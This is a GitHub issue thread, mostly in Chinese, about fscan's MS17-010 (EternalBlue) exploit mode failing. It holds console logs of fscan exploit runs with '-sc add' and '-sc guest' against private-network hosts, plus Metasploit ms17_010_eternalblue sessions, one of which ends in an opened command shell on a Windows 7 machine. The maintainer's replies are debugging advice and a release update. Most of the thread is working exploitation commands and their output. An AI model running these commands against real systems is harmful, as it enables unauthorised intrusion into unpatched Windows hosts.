fscan
fscan copied to clipboard
shadow1ng
MS17-010无法利用
PS D:\tool> & '.\fscan64 (1).exe' -h 192.168.1.95 -m ms17010 -sc add
/ _ \ ___ ___ _ __ __ _ | | __
/ /// |/ | '/ ` |/ __| |/ /
/ /\____ \ (__| | | (| | (| <
_/ |/_|| _,|___||_
fscan version: 1.8.0
-m ms17010 start scan the port: 445
start infoscan
已完成 0/0 listen ip4:icmp 0.0.0.0: socket: An attempt was made to access a socket in a way forbidden by its access permissions.
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.1.95 is alive
[] Icmp alive hosts len is: 1
192.168.1.95:445 open
[] alive ports len is: 1
start vulscan
[+] 192.168.1.95 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
已完成 1/1
[*] 扫描结束,耗时: 88.0051ms
PS D:\tool> & '.\fscan64 (1).exe' -h 192.168.1.95 -m ms17010 -sc guest
/ _ \ ___ ___ _ __ __ _ | | __
/ /// |/ | '/ ` |/ __| |/ /
/ /\____ \ (__| | | (| | (| <
_/ |/_|| _,|___||_
fscan version: 1.8.0
-m ms17010 start scan the port: 445
start infoscan
已完成 0/0 listen ip4:icmp 0.0.0.0: socket: An attempt was made to access a socket in a way forbidden by its access permissions.
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.1.95 is alive
[] Icmp alive hosts len is: 1
[] alive ports len is: 1
start vulscan
192.168.1.95:445 open
[+] 192.168.1.95 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
已完成 1/1
[*] 扫描结束,耗时: 89.0051ms
可以使用 -debug 0看看报错。 exp利用函数末尾有, common.LogSuccess("[*] " + info.Host + " MS17-010 exploit end") 这里并没看到,可能是没利用成功
PS D:\tool> & '.\fscan64 (1).exe' -h 192.168.1.95 -m ms17010 -sc add -debug 0
/ _ \ ___ ___ _ __ __ _ | | __
/ /// |/ | '/ ` |/ __| |/ /
/ /\____ \ (__| | | (| | (| <
_/ |/_|| _,|___||_
fscan version: 1.8.0
-m ms17010 start scan the port: 445
start infoscan
(icmp) Target 192.168.1.95 is alive
[] Icmp alive hosts len is: 1
[] alive ports len is: 1
start vulscan
192.168.1.95:445 open
[+] 192.168.1.95 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
已完成 0/1 failed to send nt trans: write tcp 192.168.17.15:55504->192.168.1.95:445: use of closed network connection
已完成 0/1 [-] Ms17010 192.168.1.95 write tcp 192.168.17.15:55492->192.168.1.95:445: wsasend: An existing connection was forcibly closed by the remote host.
已完成 1/1
[*] 扫描结束,耗时: 36.0021ms
补充:杀软关闭还是一样的情况
msf6 > use 0 [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.1.95 rhosts => 192.168.1.95 msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[] Started reverse TCP handler on 192.168.17.15:4444 [] 192.168.1.95:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.1.95:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit) [] 192.168.1.95:445 - Scanned 1 of 1 hosts (100% complete) [+] 192.168.1.95:445 - The target is vulnerable. [] 192.168.1.95:445 - Connecting to target for exploitation. [+] 192.168.1.95:445 - Connection established for exploitation. [+] 192.168.1.95:445 - Target OS selected valid for OS indicated by SMB reply [] 192.168.1.95:445 - CORE raw buffer dump (53 bytes) [] 192.168.1.95:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [] 192.168.1.95:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris [] 192.168.1.95:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P [] 192.168.1.95:445 - 0x00000030 61 63 6b 20 31 ack 1 [+] 192.168.1.95:445 - Target arch selected valid for arch indicated by DCE/RPC reply [] 192.168.1.95:445 - Trying exploit with 12 Groom Allocations. [] 192.168.1.95:445 - Sending all but last fragment of exploit packet [-] 192.168.1.95:445 - Errno::ECONNRESET: An existing connection was forcibly closed by the remote host. [] Exploit completed, but no session was created. msf6 exploit(windows/smb/ms17_010_eternalblue) >
那估计是当前环境下,ms17_010_eternalblue模块攻击失败。 有些情况下虽然是win7、win2008,但ms17_010_eternalblue也不一定能打
但是能打的环境 fscan也打不了¯_(ツ)_/¯ PS D:\tool> & '.\fscan64 (1).exe' -h 192.168.16.118 -m ms17010 -sc guest
/ _ \ ___ ___ _ __ __ _ | | __
/ /// |/ | '/ ` |/ __| |/ /
/ /\____ \ (__| | | (| | (| <
_/ |/_|| _,|___||_
fscan version: 1.8.0
-m ms17010 start scan the port: 445
start infoscan
(icmp) Target 192.168.16.118 is alive
[] Icmp alive hosts len is: 1
192.168.16.118:445 open
[] alive ports len is: 1
start vulscan
[+] 192.168.16.118 MS17-010 (Windows 7 Ultimate 7601 Service Pack 1)
已完成 1/1
[*] 扫描结束,耗时: 233.0133ms
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[] 192.168.16.118:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.16.118:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit) [] 192.168.16.118:445 - Scanned 1 of 1 hosts (100% complete) [+] 192.168.16.118:445 - The target is vulnerable. [] 192.168.16.118:445 - Connecting to target for exploitation. [+] 192.168.16.118:445 - Connection established for exploitation. [+] 192.168.16.118:445 - Target OS selected valid for OS indicated by SMB reply [] 192.168.16.118:445 - CORE raw buffer dump (38 bytes) [] 192.168.16.118:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima [] 192.168.16.118:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service [] 192.168.16.118:445 - 0x00000020 50 61 63 6b 20 31 Pack 1 [+] 192.168.16.118:445 - Target arch selected valid for arch indicated by DCE/RPC reply [] 192.168.16.118:445 - Trying exploit with 12 Groom Allocations. [] 192.168.16.118:445 - Sending all but last fragment of exploit packet [] 192.168.16.118:445 - Starting non-paged pool grooming [+] 192.168.16.118:445 - Sending SMBv2 buffers [+] 192.168.16.118:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [] 192.168.16.118:445 - Sending final SMBv2 buffers. [] 192.168.16.118:445 - Sending last fragment of exploit packet! [] 192.168.16.118:445 - Receiving response from exploit packet [+] 192.168.16.118:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [] 192.168.16.118:445 - Sending egg to corrupted connection. [] 192.168.16.118:445 - Triggering free of corrupted buffer. [] Started bind TCP handler against 192.168.16.118:4444 [] Sending stage (336 bytes) to 192.168.16.118 [+] 192.168.16.118:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.16.118:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.16.118:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [] Command shell session 1 opened (192.168.17.15:60165 -> 192.168.16.118:4444) at 2022-07-05 12:49:07 +0800
Shell Banner: Microsoft Windows [_ 6.1.7601]
C:\Windows\system32>
Release里更新了
发自我的iPhone
------------------ 原始邮件 ------------------ 发件人: 菠萝小西瓜 @.> 发送时间: 2022年7月5日 13:06 收件人: shadow1ng/fscan @.> 抄送: 影舞者 @.>, Comment @.> 主题: Re: [shadow1ng/fscan] MS17-010无法利用 (Issue #202)
我刚更新了一下代码和exe。师傅再试试? 不过fscan m17利用只适用于备选工具,更推荐其他ms17010的专项利用工具
能发下win x64的release吗 本地没有go环境( ̄m ̄)
— Reply to this email directly, view it on GitHub, or unsubscribe. You are receiving this because you commented.Message ID: @.***>
Release里更新了
D:\tool> ./main.exe -h 192.168.16.118 -m ms17010 -sc add -debug 0
/ _ \ ___ ___ _ __ __ _ | | __
/ /// |/ | '/ ` |/ __| |/ /
/ /\____ \ (__| | | (| | (| <
_/ |/_|| _,|___||_
fscan version: 1.8.0
-m ms17010 start scan the port: 445
start infoscan
(icmp) Target 192.168.16.118 is alive
[] Icmp alive hosts len is: 1
[] alive ports len is: 1
192.168.16.118:445 open
start vulscan
[+] 192.168.16.118 MS17-010 (Windows 7 Ultimate 7601 Service Pack 1)
[] 192.168.16.118 MS17-010 exploit end
已完成 1/1
[] 扫描结束,耗时: 47.0027ms
这么快不合理吧.....